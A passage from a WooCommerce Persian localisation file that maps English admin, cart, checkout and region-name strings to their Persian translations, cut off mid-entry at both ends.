cache.'=>'بازیابی اجباری داده های تازه به جای کش.','Registered schema for %s'=>'اسکیمای ثبت شده برای %s','action marked as failed after %s seconds. Unknown error occurred. Check server, PHP and database error logs to diagnose cause.'=>'عملیات پس از %s ثانیه به عنوان ناموفق علامت‌گذاری شد. خطای ناشناخته رخ داد. گزارش‌های خطای سرور، PHP و پایگاه داده را برای تشخیص علت، بررسی کنید.','Enable guided mode'=>'فعال‌سازی حالت راهنما','Caught exception while cancelling action "%1$s": %2$s'=>'در حین لغو اقدام، استثنا گرفت: "%1$s": %2$s','block titleFeatured Product'=>'محصول ویژه','block descriptionVisually highlight a product category and encourage prompt action.'=>'به صورت بصری یک دسته محصول را برجسته و اقدام سریع را تشویق کنید.','block titleFeatured Category'=>'دستهٔ ویژه','Notes'=>'یادداشت‌ها','Admin'=>'مدیر','Options'=>'گزینه‌ها','Disabled Features'=>'امکانات غیرفعال','Which features are enabled?'=>'چه امکاناتی فعال هستند؟','Enabled Features'=>'امکانات فعال','Admin menu nameHome'=>'خانه','TikTok for WooCommerce'=>'TikTok برای ووکامرس','Not scheduled'=>'برنامه‌ریزی نشده','Which features are disabled?'=>'کدام امکانات غیرفعال هستند؟','Verification completed.'=>'تاییدیه کامل شد.','Grow your online sales by promoting your products on TikTok to over one billion monthly active users around the world.'=>'با تبلیغ محصولات خود در TikTok به بیش از یک میلیارد کاربر فعال ماهانه در سراسر جهان، فروش آنلاین خود را افزایش دهید.','PIN Code'=>'کد پین','How many notes in the database?'=>'چند یادداشت در پایگاه‌داده است؟','Properties of the main product image.'=>'ویژگی های تصویر محصول اصلی.','Failed to initialise WC_Filesystem API while trying to update the MaxMind Geolocation database.'=>'هنگام تلاش برای به روز رسانی پایگاه داده MaxMind Geolocation، راه اندازی API WC_Filesystem انجام نشد.','Do the important options return expected values?'=>'آیا گزینه های مهم مقادیر مورد انتظار را برمی گرداند؟','Is the daily cron job active, when does it next run?'=>'آیا کار روزانه cron فعال است، بعد کی اجرا می شود؟','Daily Cron'=>'کرون روزانه','This section shows details of WC Admin.'=>'این بخش جزئیات مدیریت WC را نشان می دهد.','Infinite loop detected, aborting. No errors found.'=>'حلقه بی‌نهایت شناسایی شد، در حال متوقف کردن. هیچ خطایی پیدا نشد.','Whether an order needs processing before it can be completed.'=>'اینکه آیا یک سفارش قبل از تکمیل نیاز به پردازش دارد یا خیر.','Whether an order needs payment, based on status and order total.'=>'اینکه آیا یک سفارش بر اساس وضعیت و کل سفارش نیاز به پرداخت دارد یا خیر.','Whether an order can be edited.'=>'آیا می توان یک سفارش را ویرایش کرد.','Batch %1$d (%2$d orders) completed in %3$d seconds.'=>'دسته %1$d (%2$d سفارش) در %3$d ثانیه تکمیل شد.','There are no orders to verify, aborting.'=>'هیچ دستوری برای تأیید وجود ندارد، لغو می‌شود.','There are no orders to sync, aborting.'=>'هیچ دستوری برای همگام‌سازی وجود ندارد، لغو می‌شود.','Not all expected'=>'همه‌ی چیزی که مورد انتظار بود نیست','Onboarding'=>'آماده سازی','Was onboarding completed or skipped?'=>'آماده سازی کامل شد یا نادیده گرفته شد؟','Custom order table usage is not enabled. If you are testing, you can enable it by following the testing instructions in %s'=>'استفاده از جدول سفارش سفارشی فعال نیست. اگر در حال آزمایش هستید، می‌توانید با دنبال کردن دستورالعمل‌های آزمایش در %s آن را فعال کنید','Beginning verification for batch #%1$d (%2$d orders/batch).'=>'شروع تأیید برای دسته #%1$d (%2$d سفارش/دسته).','Beginning batch #%1$d (%2$d orders/batch).'=>'دسته اولیه #%1$d (%2$d سفارش/دسته).','String processors must be an array of valid callbacks.'=>'پردازنده‌های رشته‌ای باید آرایه‌ای از فراخوانی‌های معتبر باشند.','%1$d order was synced in %2$d seconds.'=>'%1$d سفارش در %2$d ثانیه همگام سازی شد.','%1$d order was verified in %2$d seconds.'=>'%1$d سفارش در %2$d ثانیه تایید شد.','There is %1$d order to be synced.'=>'%1$d سفارش برای انتقال وجود دارد.','There is %1$d order to be verified.'=>'%1$d سفارش برای تایید کردن وجود دارد.','All sales channels'=>'همه کانال‌های فروش','block titleCart Items'=>'اقلام سبد خرید','block descriptionShows cart items.'=>'اقلام سبد خرید را نشان می‌دهد.','block descriptionShows the cart taxes row.'=>'ردیف مالیات سبد خرید را نشان می‌دهد.','block titleShipping'=>'حمل و نقل','block descriptionShows the cart shipping row.'=>'ردیف حمل و نقل سبد خرید را نشان می‌دهد.','block titleFees'=>'هزینه‌ها','block titleDiscount'=>'تخفیف','block titleCoupon Form'=>'فرم کد تخفیف','block titleTaxes'=>'مالیات‌ها','block titleHeading'=>'سرتیتر','block descriptionShows the cart discount row.'=>'ردیف تخفیف سبد خرید را نشان می‌دهد.','block descriptionShows the heading row.'=>'ردیف تیتر سبد خرید را نشان می‌دهد.','block descriptionShows the apply coupon form.'=>'فرم اعمال کدتخفیف را نشان می‌دهد.','block descriptionShows the cart fee row.'=>'ردیف هزینۀ سبد خرید را نشان می‌دهد.','block descriptionShows the cart subtotal row.'=>'ردیف جمع جزء را نمایش می‌دهد.','block titleSubtotal'=>'جمع جزء','Welcome to %s'=>'به %s خوش‌آمدید','Approved Directory URLsSearch'=>'جستجو','Approved product download directoriesEnable All'=>'فعال‌سازی همه','Approved product download directoriesDisable All'=>'غیرفعال کردن همه','Product downloads listEdit'=>'ویرایش','Approved product download directoriesEnabled'=>'فعال','Approved product download directoriesURL'=>'آدرس','Product downloads listDelete permanently'=>'پاک کردن‌ برای همیشه','Approved product download URLs migrationinvalid URL'=>'نشان اینترنتی نا معتبر است','URL was successfully updated.'=>'آدرس با موفقیت به روز شد.','URL was successfully added.'=>'نشانی با موفقیت افزوده شد.','%s is not a valid URL.'=>'%s نشانی معتبری نیست.','Approved product download directoriesDirectory URL'=>'نشانی پوشه','Add New Approved Directory'=>'افزودن پوشۀ تأیید شده جدید','Edit Approved Directory'=>'ویرایش پوشۀ تأیید شده','Approved product download directoriesThe provided ID was invalid.'=>'شناسۀ ارائه شده نامعتبر است.','Enable rule'=>'فعال‌سازی قاعده','Disable rule'=>'غیرفعال‌سازی قاعده','Synchronize approved download directories'=>'همگام‌سازی مسیرهای پذیرفته‌شدۀ بارگیری','Cancel synchronization of approved directories'=>'لغو همگام‌سازی مسیرهای پذیرفته‌شدۀ بارگیری','Empty the approved download directories list'=>'پاک کردن لیست مسیرهای پذیرفته‌شدۀ بارگیری','It was not possible to synchronize download directories following the most recent update.'=>'همگام‌سازی پوشه‌های دانلود، پس از به روز رسانی به ۶.۴.۰ امکان پذیر نبود.','Approved product download directoriesStop Enforcing Rules'=>'اجرای قوانین را متوقف کنید','Approved download directories'=>'مسیرهای پذیرفته‌شدۀ بارگیری','Approved Download Directories'=>'مسیرهای پذیرفته‌شدۀ بارگیری','Approved Download Directories sync: scan has been cancelled.'=>'همگام‌سازی مسیرهای پذیرفته‌شدۀ بارگیری: اسکن لغو شده است.','Approved Download Directories sync: new scan scheduled.'=>'همگام‌سازی مسیرهای پذیرفته‌شدۀ بارگیری: اسکن جدید برنامه‌ریزی شده.','Approved Download Directories sync: scan is complete!'=>'همگام‌سازی مسیرهای پذیرفته‌شدۀ بارگیری: اسکن کامل شد!','Approved Download Directories sync: completed batch %1$d (%2$d%% complete).'=>'همگام‌سازی مسیرهای پذیرفته‌شدۀ بارگیری: دسته کامل شده %1$d (%2$d%% کامل).','Approved product download directoriesStart Enforcing Rules'=>'شروع اجرای قوانین','URL could not be updated (probable database error).'=>'URL نمی‌تواند به‌روز شود (خطای احتمالی پایگاه‌داده).','URL could not be added (probable database error).'=>'URL نمی‌تواند اضافه شود (خطای احتمالی پایگاه‌داده).','"%s" could not be saved. Please review, ensure it is a valid URL and try again.'=>'"%s" ذخیره نشد. لطفا بررسی کنید، مطمئن شوید که یک URL معتبر است و دوباره امتحان کنید.','You do not have permission to modify the list of approved directories for product downloads.'=>'شما اجازه تغییر فهرست دایرکتوری های تایید شده برای دانلود محصول را ندارید.','The Approved Product Download Directories list is currently being synchronized with the product catalog (%d%% complete). If you need to, you can cancel it.'=>'فهرست راهنماهای دانلود محصول تأیید شده در حال حاضر با کاتالوگ محصول همگام سازی می شود (%d%% کامل شده است). در صورت نیاز می توانید آن را لغو کنید.','Removes all existing entries from the Approved Product Download Directories list.'=>'تمام ورودی‌های موجود را از فهرست فهرست راهنمای دانلود محصول تأیید شده حذف می‌کند.','Updates the list of Approved Product Download Directories. Note that triggering this tool does not impact whether the Approved Download Directories list is enabled or not.'=>'لیست فهرست راهنمای دانلود محصولات تایید شده را به روز می کند. توجه داشته باشید که فعال کردن این ابزار بر فعال بودن یا نبودن لیست دایرکتوری های دانلود تایید شده تأثیری ندارد.','Synchronization of approved product download directories is already in progress.'=>'همگام سازی فهرست های دانلود محصول تایید شده در حال حاضر در حال انجام است.','Approved directory URLs cannot be longer than 256 characters.'=>'URL های دایرکتوری تایید شده نمی توانند بیشتر از 256 کاراکتر باشند.','No approved directory URLs found.'=>'هیچ نشانی وب دایرکتوری تأیید شده ای یافت نشد.','Product download migration: %1$s (for product %1$d) could not be added to the list of approved download directories.'=>'انتقال بارگیری محصول: %1$s (برای محصول %1$d) نمی‌تواند به فهرست دانلود دایرکتوری‌های تایید شده اضافه شود.','%d URL could not be updated.'=>'%d نشانی نمی‌تواند بروز رسانی شود.','%d approved directory URL deleted.'=>'%d آدرس اینترنتی دایرکتوری تایید شده، حذف شد.','%d approved directory URL disabled.'=>'%d آدرس اینترنتی دایرکتوری تایید شده، غیرفعال است.','%d approved directory URL enabled.'=>'%d آدرس اینترنتی دایرکتوری تایید شده، فعال است.','Approved product download directory viewsAll (%s)'=>'همه (%s)','Approved product download directory viewsDisabled (%s)'=>'(%s) غیرفعال','Approved product download directory viewsEnabled (%s)'=>'فعال (%s)','Amazon Pay'=>'Amazon Pay','Affirm'=>'Affirm','Afterpay'=>'Afterpay','Pinterest for WooCommerce'=>'پینترست برای ووکامرس','You created %s'=>'شما %s را ایجاد کردید','You added store details'=>'شما جزئیات فروشگاه را اضافه کردید','Get your products in front of Pinterest users searching for ideas and things to buy. Get started with Pinterest and make your entire product catalog browsable.'=>'محصولات خود را در مقابل کاربران پینترست که در جستجوی ایده‌ها و چیزهایی برای خرید هستند قرار دهید. با پینترست شروع کنید و کل کاتالوگ محصولات خود را قابل مرور کنید.','Affirm’s tailored Buy Now Pay Later programs remove price as a barrier, turning browsers into buyers, increasing average order value, and expanding your customer base.'=>'برنامه‌های سفارشی Affirm Buy Now Pay Later قیمت را به عنوان یک مانع حذف می‌کند، مرورگرها را به خریداران تبدیل می‌کند، میانگین ارزش سفارش را افزایش می‌دهد و پایگاه مشتری شما را گسترش می‌دهد.','Enable a familiar, fast checkout for hundreds of millions of active Amazon customers globally.'=>'یک تسویه حساب سریع و آشنا را برای صدها میلیون مشتری فعال آمازون در سراسر جهان فعال کنید.','Afterpay allows customers to receive products immediately and pay for purchases over four installments, always interest-free.'=>'پس از پرداخت به مشتریان این امکان را می دهد که محصولات را بلافاصله دریافت کنند و برای خریدهای خود در چهار قسط و همیشه بدون بهره پرداخت کنند.','There are orders pending sync.'=>'سفارش‌هایی در انتظار همگام‌سازی هستند.','Suggestion description.'=>'توضیح پیشنهاد.','(no ID)'=>'(بدون شناسه)','Eswatini'=>'Eswatini','Only show meta which is meant to be displayed for an order.'=>'فقط متای را نشان دهید که برای سفارش نمایش داده می شود.','Error saving order ID %1$s.'=>'خطا در هنگام ذخیره‌سازی سفارش با شناسۀ %1$s.','Are you sure you wish to delete this item?'=>'مطمئنید که مایل به حذف این مورد هستید؟','The indicated downloads have been disabled (invalid location or filetype—%1$slearn more%2$s).'=>'دانلودهای مشخص شده غیرفعال شده اند (مکان یا نوع فایل نامعتبر & mdash;%1$s بیشتر بدانید %2$s).','The downloadable file %s cannot be used as it has been disabled.'=>'فایل قابل دانلود %s نمی تواند استفاده شود زیرا غیرفعال شده است.','Is your site enforcing the use of Approved Product Download Directories?'=>'آیا سایت شما از دایرکتوری های دانلود محصول تایید شده استفاده می کند؟','Enforce Approved Product Download Directories'=>'دایرکتوری های دانلود محصول تایید شده را اجرا کنید','Gateway title.'=>'عنوان درگاه پرداخت.','Priority of recommendation.'=>'اولویت توصیه.','Array of plugin slugs.'=>'آرایه‌ای از نامک‌های افزونه.','Suggestion visibility.'=>'قابلیتِ مشاهدۀ پیشنهاد.','Gateway image.'=>'تصویر درگاه پرداخت.','Suggestion ID.'=>'شناسۀ پیشنهاد.','Sorry, experiment_name is required.'=>'متاسفانه ! experiment_name ضروری است.','Headers already sent when generating download error message.'=>'هنگام ایجاد پیام خطای دانلود، هدرها از قبل ارسال شده‌اند.','The %1$sApproved Product Download Directories list%2$s has been updated. To protect your site, please review the list and make any changes that might be required. For more information, please refer to %3$sthis guide%2$s.'=>'فهرست %1$s فهرست راهنماهای دانلود محصول تأییدشده%2$s بروز رسانی شده است. برای محافظت از سایت خود، لطفا فهرست را مرور کنید و هر گونه تغییری که ممکن است لازم باشد را انجام دهید. برای اطلاعات بیشتر، لطفا به %3$sاین راهنما%2$s مراجعه کنید.','How easy was it to edit your product?'=>'چگونه به سادگی محصول خود را ویرایش کنیم؟','Start shopping'=>'شروع به خرید کنید','block titleMini-Cart Shopping Button'=>'دکمه سبد خرید کوچک','block descriptionBlock that displays the shopping button when the Mini-Cart is empty.'=>'بلوکی که وقتی مینی سبد خالی است، دکمه خرید را نمایش می دهد.','Custom orders tables have been deleted.'=>'جدول‌های سفارش‌های سفارشی حذف شده است.','Delete the custom orders tables'=>'جداول سفارشات سفارشی را حذف کنید','Plugin activation has been scheduled.'=>'فعال سازی افزونه برنامه ریزی شده است.','Optional parameter to get only specific task lists by id.'=>'پارامتر اختیاری برای دریافت فقط لیست وظایف خاص با شناسه.','Shows if the product needs to be configured before it can be bought.'=>'نشان می دهد که آیا محصول قبل از خرید نیاز به پیکربندی دارد یا خیر.','Nonce is invalid.'=>'کلید سرّی نامعتبر است.','Missing the Nonce header. This endpoint requires a valid nonce.'=>'فاقد کلید سرّی سربرگ. این نقطۀ پایانی به یک کلید سرّی معتبر نیاز دارد.','Plugin installation has been scheduled.'=>'نصب افزونه برنامه‌ریزی شده است.','Order payment URL.'=>'آدرس پرداخت سفارش.','The maximum quantity that can be added to the cart.'=>'حداکثر مقداری که می‌توان به سبد خرید اضافه کرد.','The minimum quantity that can be added to the cart.'=>'حداقل مقداری که می‌توان به سبد خرید اضافه کرد.','Received PDT notification for another account: %1$s. Order ID: %2$d.'=>'اعلان PDT برای حساب دیگر دریافت شد: %1$s. شناسه سفارش: %2$d.','Received PDT notification for order %1$d on endpoint for order %2$d.'=>'اعلان PDT برای سفارش %1$d در ارجاع برای سفارش %2$d دریافت شد.','block titleCheckout'=>'تسویه حساب','block keywordWooCommerce'=>'ووکامرس','block titleMini-Cart Items'=>'موارد سبد خرید کوچک','block descriptionDisplay a checkout form so your customers can submit orders.'=>'یک فرم تسویه حساب را نمایش دهید تا مشتریان شما بتوانند سفارشات خود را ارسال کنند.','block descriptionContains the products table and other custom blocks of filled mini-cart.'=>'شامل جدول محصولات و سایر بلوک های سفارشی مینی سبد خرید پر شده است.','This means that the table is probably in an inconsistent state. It\'s recommended to run a new regeneration process or to resume the aborted process (Status - Tools - Regenerate the product attributes lookup table/Resume the product attributes lookup table regeneration) before enabling the table usage.'=>'این به این معنی است که جدول احتمالاً در وضعیت ناهماهنگی قرار دارد. توصیه می شود قبل از فعال کردن استفاده از جدول، یک فرآیند بازسازی جدید را اجرا کنید یا روند متوقف‌شده را از سر بگیرید (وضعیت > ابزارها > ایجاد مجدد جدول جستجوی ویژگی‌های محصول/ازسرگیری بازسازی جدول جستجوی ویژگی‌های محصول).','Email address (optional)'=>'آدرس ایمیل (اختیاری)','Resume'=>'ادامه دادن','WARNING: The product attributes lookup table regeneration process was aborted.'=>'هشدار: فرآیند بازسازی جدول جستجوی ویژگی‌های محصول متوقف شد.','Product attributes lookup table regeneration process has been resumed.'=>'روند بازسازی جدول جستجوی ویژگی‌های محصول از سر گرفته شده است.','This tool will resume the product attributes lookup table regeneration at the point in which it was aborted (%1$s products were already processed).'=>'این ابزار بازسازی جدول جستجوی ویژگی‌های محصول را در نقطه‌ای که در آن لغو شده است (%1$s محصولات قبلاً پردازش شده بودند) از سر می‌گیرد.','Resume the product attributes lookup table regeneration'=>'بازسازی جدول جستجوی ویژگی‌های محصول را از سر بگیرید','Product attributes lookup table regeneration process has been aborted.'=>'فرآیند بازسازی جدول جستجوی ویژگی‌های محصول متوقف شده است.','This tool will abort the regenerate product attributes lookup table regeneration. After this is done the process can be either started over, or resumed to continue where it stopped.'=>'این ابزار بازسازی مجدد جدول جستجوی ویژگی‌های محصول را لغو می‌کند. پس از انجام این کار، فرآیند می‌تواند از نو شروع شود، یا از سر گرفته شود تا جایی که متوقف شده است ادامه یابد.','Abort the product attributes lookup table regeneration'=>'بازسازی جدول جستجوی ویژگی‌های محصول را لغو کنید','The amount that quantities increment by. Quantity must be an multiple of this value.'=>'مقداری که مقادیر افزایش می‌یابد. مقدار باید مضربی از این مقدار باشد.','How the quantity of this item should be controlled, for example, any limits in place.'=>'چگونه مقدار این مورد باید کنترل شود، به عنوان مثال، هرگونه محدودیت در محل.','Changing platforms might seem like a big hurdle to overcome, but it is easier than you might think to move your products, customers, and orders to WooCommerce. This article will help you with going through this process.'=>'تغییر پلتفرم‌ها ممکن است مانع بزرگی برای غلبه بر آن به نظر برسد، اما انتقال محصولات، مشتریان و سفارشاتتان به ووکامرس آسان تر از آن چیزی است که فکر می‌کنید. این مقاله به شما کمک می‌کند تا این روند را طی کنید.','Quantity of this item to add to the cart.'=>'تعداد این کالا برای افزودن به سبد خرید.','Hesse'=>'Hesse','Hamburg'=>'Hamburg','Bremen'=>'Bremen','Brandenburg'=>'Brandenburg','Berlin'=>'Berlin','Bavaria'=>'Bavaria','Baden-Württemberg'=>'Baden-Württemberg','Mecklenburg-Vorpommern'=>'Mecklenburg-Vorpommern','Lower Saxony'=>'Lower Saxony','Thuringia'=>'Thuringia','Schleswig-Holstein'=>'Schleswig-Holstein','Saxony-Anhalt'=>'Saxony-Anhalt','Saxony'=>'Saxony','Saarland'=>'Saarland','Rhineland-Palatinate'=>'Rhineland-Palatinate','North Rhine-Westphalia'=>'North Rhine-Westphalia','How to Migrate from Magento to WooCommerce'=>'نحوۀ مهاجرت از مجنتو به ووکامرس','block descriptionBlock that displays the title of the Mini-Cart block.'=>'بلوکی که عنوان بلوک سبد خرید کوچک را نمایش می‌دهد.','block descriptionBlock that displays the products table of the Mini-Cart block.'=>'بلوکی که جدول محصولات بلوک سبد خرید کوچک را نمایش می‌دهد.','block titleMini-Cart Title'=>'عنوان سبد خرید کوچک','block titleFilled Mini-Cart view'=>'نمای سبد خرید کوچکِ پُر','block descriptionBlocks that are displayed when the Mini-Cart is empty.'=>'بلوک‌هایی که وقتی سبد خرید کوچک خالی است نمایش داده می‌شوند.','block titleEmpty Mini-Cart view'=>'نمای سبد خرید کوچک خالی','block titleMini-Cart Footer'=>'پابرگ سبد خرید کوچک','block titleMini-Cart Products Table'=>'مینی سبد محصولات جدول','block descriptionBlock that displays the footer of the Mini-Cart block.'=>'بلوکی که پابرگ بلوک سبد خرید کوچک را نمایش می‌دهد.','Built by WooCommerce'=>'ساخته شده توسط ووکامرس','The status of the coupon. Should always be draft, published, or pending review'=>'وضعیت کدتخفیف. همیشه باید پیش‌نویس، منتشرشده یا در انتظار بررسی باشد','Save up to $800 in fees by managing transactions with %1$s. With %1$s, you can securely accept major cards, Apple Pay, and payments in over 100 currencies.'=>'با مدیریت تراکنش‌ها از طریق %1$s تا ۸۰۰ دلار در هزینه‌ها صرفه‌جویی کنید. با %1$s می‌توانید کارت‌های اصلی، Apple Pay و پرداخت‌های بیش از ۱۰۰ ارز را به‌طور امن بپذیرید.','Accept credit cards and other popular payment methods with %1$sWooPayments%2$s'=>'کارت‌های اعتباری و سایر روش‌های پرداخت محبوب را با %1$sWooPayments%2$s بپذیرید','Please provide a valid promo note name.'=>'لطفا یک نام یادداشت تبلیغاتی معتبر ارائه دهید.','Dismiss the gateway'=>'رد کردن درگاه','Shop country/region'=>'کشور/منطقه فروشگاه','The database version for WooCommerce. This should be the same as your WooCommerce version.'=>'نسخه دیتابس ووکامرس. این نسخه باید برابر نسخه ووکامرس فعلی باشد.','Task is not a subclass of `Task`'=>'Task زیر کلاس «Task» نیست','You have installed a development version of WooCommerce which requires files to be built and minified. From the plugin directory, run pnpm install and then pnpm --filter=\'@woocommerce/plugin-woocommerce\' build to build and minify assets.'=>'شما یک نسخه توسعه‌یافته از ووکامرس را نصب کرده‌اید که نیاز به ساخت و کوچک‌سازی فایل‌ها دارد. از فهرست پخطاین، pnpm install را اجرا کنید و سپس pnpm --filter=\'@woocommerce/plugin-woocommerce\' build را برای ساخت و کوچک سازی دارایی‌ها اجرا کنید.','La Guaira (Vargas)'=>'La Guaira (Vargas)','Treinta y Tres'=>'Treinta y Tres','Tacuarembó'=>'Tacuarembó','Soriano'=>'Soriano','Salto'=>'Salto','Rocha'=>'Rocha','Rivera'=>'Rivera','Paysandú'=>'Paysandú','Montevideo'=>'Montevideo','Maldonado'=>'Maldonado','Lavalleja'=>'Lavalleja','Flores'=>'Flores','Durazno'=>'Durazno','Colonia'=>'Colonia','Cerro Largo'=>'Cerro Largo','Canelones'=>'Canelones','Artigas'=>'Artigas','Usulután'=>'Usulután','La Unión'=>'La Unión','San Vicente'=>'San Vicente','San Salvador'=>'San Salvador','Sonsonate'=>'Sonsonate','San Miguel'=>'San Miguel','Santa Ana'=>'Santa Ana','Morazán'=>'Morazán','Cuscatlán'=>'Cuscatlán','Chalatenango'=>'Chalatenango','Cabañas'=>'Cabañas','Ahuachapán'=>'Ahuachapán','Ngöbe-Buglé'=>'Ngöbe-Buglé','Guna Yala'=>'Guna Yala','Emberá'=>'Emberá','West Panamá'=>'West Panamá','Veraguas'=>'Veraguas','Panamá'=>'Panamá','Los Santos'=>'Los Santos','Herrera'=>'Herrera','Darién'=>'Darién','Chiriquí'=>'Chiriquí','Coclé'=>'Coclé','Bocas del Toro'=>'Bocas del Toro','Río San Juan'=>'Río San Juan','Rivas'=>'Rivas','Nueva Segovia'=>'Nueva Segovia','Matagalpa'=>'Matagalpa','Masaya'=>'Masaya','Managua'=>'Managua','Madriz'=>'Madriz','Jinotega'=>'Jinotega','Estelí'=>'Estelí','Chontales'=>'Chontales','Chinandega'=>'Chinandega','Carazo'=>'Carazo','Boaco'=>'Boaco','Atlántico Sur'=>'Atlántico Sur','Atlántico Norte'=>'Atlántico Norte','Yoro'=>'Yoro','Santa Bárbara'=>'Santa Bárbara','Olancho'=>'Olancho','Ocotepeque'=>'Ocotepeque','Lempira'=>'Lempira','Intibucá'=>'Intibucá','Gracias a Dios'=>'Gracias a Dios','Francisco Morazán'=>'Francisco Morazán','El Paraíso'=>'El Paraíso','Cortés'=>'Cortés','Copán'=>'Copán','Comayagua'=>'Comayagua','Colón'=>'Colón','Choluteca'=>'Choluteca','Bay Islands'=>'Bay Islands','Atlántida'=>'Atlántida','Zamora-Chinchipe'=>'Zamora-Chinchipe','Tungurahua'=>'Tungurahua','Sucumbíos'=>'Sucumbíos','Santo Domingo de los Tsáchilas'=>'Santo Domingo de los Tsáchilas','We encountered an SSL error. Please ensure your site supports TLS version 1.2 or above.'=>'ما با خطای SSL مواجه شدیم، لطفا مطمئن شوید سایت شما از TLS نسخه 1.2 یا بالاتر پشتیبانی می‌کند.','Our request to the %s API got a malformed response.'=>'درخواست ما از API %s با پاسخی ناقص مواجه شد.','Our request to the %1$s API got error code %2$d.'=>'درخواست ما به API %1$s با کد خطای %2$d مواجه شد.','Santa Elena'=>'Santa Elena','Pichincha'=>'Pichincha','Pastaza'=>'Pastaza','Orellana'=>'Orellana','Napo'=>'Napo','Morona-Santiago'=>'Morona-Santiago','Manabí'=>'Manabí','Loja'=>'Loja','Imbabura'=>'Imbabura','Guayas'=>'Guayas','Galápagos'=>'Galápagos','Esmeraldas'=>'Esmeraldas','El Oro'=>'El Oro','Cotopaxi'=>'Cotopaxi','Chimborazo'=>'Chimborazo','Carchi'=>'Carchi','Cañar'=>'Cañar','Azuay'=>'Azuay','Yuma'=>'Yuma','Valdesia'=>'Valdesia','Ozama'=>'Ozama','Higüamo'=>'Higüamo','Enriquillo'=>'Enriquillo','El Valle'=>'El Valle','Cibao Sur'=>'Cibao Sur','Cibao Norte'=>'Cibao Norte','Cibao Noroeste'=>'Cibao Noroeste','Cibao Nordeste'=>'Cibao Nordeste','San José'=>'San José','Puntarenas'=>'Puntarenas','Limón'=>'Limón','Heredia'=>'Heredia','Guanacaste'=>'Guanacaste','Cartago'=>'Cartago','Alajuela'=>'Alajuela','Vichada'=>'Vichada','Vaupés'=>'Vaupés','Valle del Cauca'=>'Valle del Cauca','Tolima'=>'Tolima','San Andrés & Providencia'=>'San Andrés & Providencia','Santander'=>'Santander','Risaralda'=>'Risaralda','Quindío'=>'Quindío','Putumayo'=>'Putumayo','Norte de Santander'=>'Norte de Santander','Nariño'=>'Nariño','Meta'=>'Meta','Magdalena'=>'Magdalena','La Guajira'=>'La Guajira','Huila'=>'Huila','Guaviare'=>'Guaviare','Guainía'=>'Guainía','Capital District'=>'Capital District','Cundinamarca'=>'Cundinamarca','Chocó'=>'Chocó','Cesar'=>'Cesar','Cauca'=>'Cauca','Casanare'=>'Casanare','Caquetá'=>'Caquetá','Caldas'=>'Caldas','Boyacá'=>'Boyacá','Atlántico'=>'Atlántico','Arauca'=>'Arauca','Antioquia'=>'Antioquia','Vlorë'=>'Vlorë','Tirana'=>'Tirana','Shkodër'=>'Shkodër','Lezhë'=>'Lezhë','Kukës'=>'Kukës','Korçë'=>'Korçë','Gjirokastër'=>'Gjirokastër','Fier'=>'Fier','Elbasan'=>'Elbasan','Durrës'=>'Durrës','Berat'=>'Berat','Dibër'=>'Dibër','block titleAccepted Payment Methods'=>'روش‌های پرداخت قابل قبول','Shipping, taxes, and discounts calculated at checkout.'=>'حمل و نقل، مالیات، و تخفیف‌ها در هنگام پرداخت محاسبه می‌شوند.','View my cart'=>'مشاهدهٔ سبد خرید من','Go to checkout'=>'رفتن به پرداخت','block descriptionDisplay accepted payment methods.'=>'نمایش روش‌های پرداخت قابل قبول.','A link to set a new password will be sent to your email address.'=>'یک لینک برای تعیین رمز عبور جدید به آدرس ایمیل شما ارسال می‌شود.','No theme is defined for this template.'=>'هیچ پوسته‌ای برای این قالب تعریف نشده است.','List of extended deprecated tasks from the client side filter.'=>'فهرست کارهای منسوخ شده از فیلتر سمت سرویس گیرنده.','This is an order notification sent to customers containing order details after an order is placed on-hold from Pending, Cancelled or Failed order status.'=>'این یک اعلان سفارش است که حاوی جزئیات سفارش پس از توقف سفارش از وضعیت سفارش در حال تعلیق، لغو شده یا ناموفق برای مشتریان ارسال می‌شود.','Valparaíso'=>'Valparaíso','Tarapacá'=>'Tarapacá','Región Metropolitana de Santiago'=>'Región Metropolitana de Santiago','Ñuble'=>'Ñuble','Maule'=>'Maule','Magallanes'=>'Magallanes','Los Ríos'=>'Los Ríos','Los Lagos'=>'Los Lagos','Libertador General Bernardo O\'Higgins'=>'Libertador General Bernardo O\'Higgins','Coquimbo'=>'Coquimbo','Biobío'=>'Biobío','Atacama'=>'Atacama','La Araucanía'=>'La Araucanía','Arica y Parinacota'=>'Arica y Parinacota','Antofagasta'=>'Antofagasta','Aisén del General Carlos Ibañez del Campo'=>'Aisén del General Carlos Ibañez del Campo','Product Reviews'=>'بررسی‌های محصول','Browse categories'=>'کاوش دسته‌ها','There was an error generating your API Key.'=>'هنگام ایجاد کلید API شما خطایی روی داد.','block titleTerms and Conditions'=>'شرایط و ضوابط','block titleShipping Options'=>'گزینه‌های ارسال','block titlePayment Options'=>'گزینه‌های پرداخت','block descriptionAllow customers to add a note to their order.'=>'به مشتریان اجازه دهید یک یادداشت به سفارش خود اضافه کنند.','block titleOrder Note'=>'یادداشت سفارش','block titleContact Information'=>'اطلاعات تماس','block titleShipping Address'=>'آدرس ارسال محموله','block descriptionPayment options for your store.'=>'گزینه‌های پرداخت برای فروشگاه شما.','block descriptionColumn containing the checkout totals.'=>'ستون حاوی مجموع تسویه حساب.','block titleCheckout Totals'=>'مجموع تسویه حساب','block titleBilling Address'=>'آدرس صورت‌حساب','block titleActions'=>'عملیات‌ها','block titleProceed to Checkout'=>'ادامه دادن به پرداخت','block titleCheckout Fields'=>'زمینه‌های پرداخت','block descriptionAllow customers proceed to Checkout.'=>'به مشتریان اجازه دهید تا پرداخت را ادامه دهند.','block descriptionContains blocks that are displayed when the cart contains products.'=>'حاوی بلوک‌هایی است که وقتی سبد خرید حاوی محصول است نمایش داده می‌شود.','block descriptionCollect your customer\'s shipping address.'=>'آدرس حمل و نقل مشتری خود را جمع آوری کنید.','block descriptionColumn containing checkout address fields.'=>'ستون حاوی فیلدهای آدرس پرداخت.','block descriptionCollect your customer\'s contact information.'=>'اطلاعات تماس مشتری خود را جمع آوری کنید.','block descriptionCollect your customer\'s billing address.'=>'آدرس صورتحساب مشتری خود را جمع آوری کنید.','block descriptionAllow customers to place their order.'=>'به مشتریان اجازه دهید سفارش خود را ثبت کنند.','block descriptionEnsure that customers agree to your Terms & Conditions and Privacy Policy.'=>'اطمینان حاصل کنید که مشتریان با شرایط و ضوابط و سیاست‌های حریم خصوصی شما موافقت می‌کنند.','Your cart'=>'سبد خرید شما','Eway'=>'Eway','block titleOrder Summary'=>'خلاصه سفارش','block titleFilled Cart'=>'سبد خرید پُرشده','block descriptionContains blocks that are displayed when the cart is empty.'=>'حاوی بلوک‌هایی است که وقتی سبد خرید خالی است نمایش داده می‌شوند.','block descriptionColumn containing the cart 